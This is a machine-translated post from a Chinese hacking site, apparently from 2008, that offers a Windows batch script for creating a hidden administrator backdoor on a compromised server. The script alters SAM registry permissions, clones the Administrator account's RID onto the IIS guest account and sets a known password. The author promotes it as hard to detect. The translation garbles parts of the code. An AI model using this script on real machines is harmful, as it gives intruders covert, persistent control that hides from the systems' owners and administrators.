Copy and the real hidden administrator account(complete batch)-bug warning-the black bar safety net

ID MYHACK58:62200821419
Type myhack58
Reporter 佚名
Modified 2008-12-10T00:00:00


Online to see a lot of copy administator permissions to the account of the method or tool, such as the establishment of the admin$, the so-called hidden account.

And copy administrator permissions.

In fact, this is a temporary, one-time hidden only, Server reboot through the“Computer Management”or net user

Are able to see.

The present batch based on the server situation, combined with their own research, using the server's local iis account iusr_computername, the

Set the password bit 1 2 3 4 5 6 7 8 You can yourself change the batch last line of it.

This to copy the administrator rights, it is difficult to find and arouse suspicion.

Of course, the other account can also, use this account primarily by machine name will be able to know their desired invasion account password is how much)


echo off setlocal enabledelayedexpansion echo %computername% echo HKEY_LOCAL_MACHINE\SAM\SAM [1 1 7] >"%windir%\..\1. reg" regini "%windir%\..\1. reg" regedit /e "%windir%\..\1. reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername% rem unicode ->ascii type "%windir%\..\1. reg" >"%windir%\..\2. reg" del /q "%windir%\..\1. reg" rem find the IUSR_%computername% in the corresponding id for /F "delims=( tokens=1-5 skip=3" %%a in (%windir%\..\2. reg) do set iusr_id=%%b del /q "%windir%\..\2. reg" rem export administrator register regedit /e "%windir%\..\1. reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 type "%windir%\..\1. reg" >"%windir%\..\2. reg" del /q "%windir%\..\1. reg" rem replace 1fx->iusr_id for /f "tokens= delims=:" %%i in (%windir%\..\2. reg) do ( for /f "tokens=*" %%j in ("%%i") do ( set TMP=%%j set "TMP=! TMP:000001F4=0 0 0 0 0%iusr_id:~0,3%!" echo ! TMP!& gt;>%windir%\..\1. reg ) ) regedit /s %windir%\..\1. reg del /q %windir%\..\1. reg del /q %windir%\..\2. reg echo HKEY_LOCAL_MACHINE\SAM\SAM [1 7] >"%windir%\..\1. reg" regini "%windir%\..\1. reg" del /q "%windir%\..\1. reg" net user IUSR_%computername% 1 2 3 4 5 6 7 8


Transferred from:it%5Fsecurity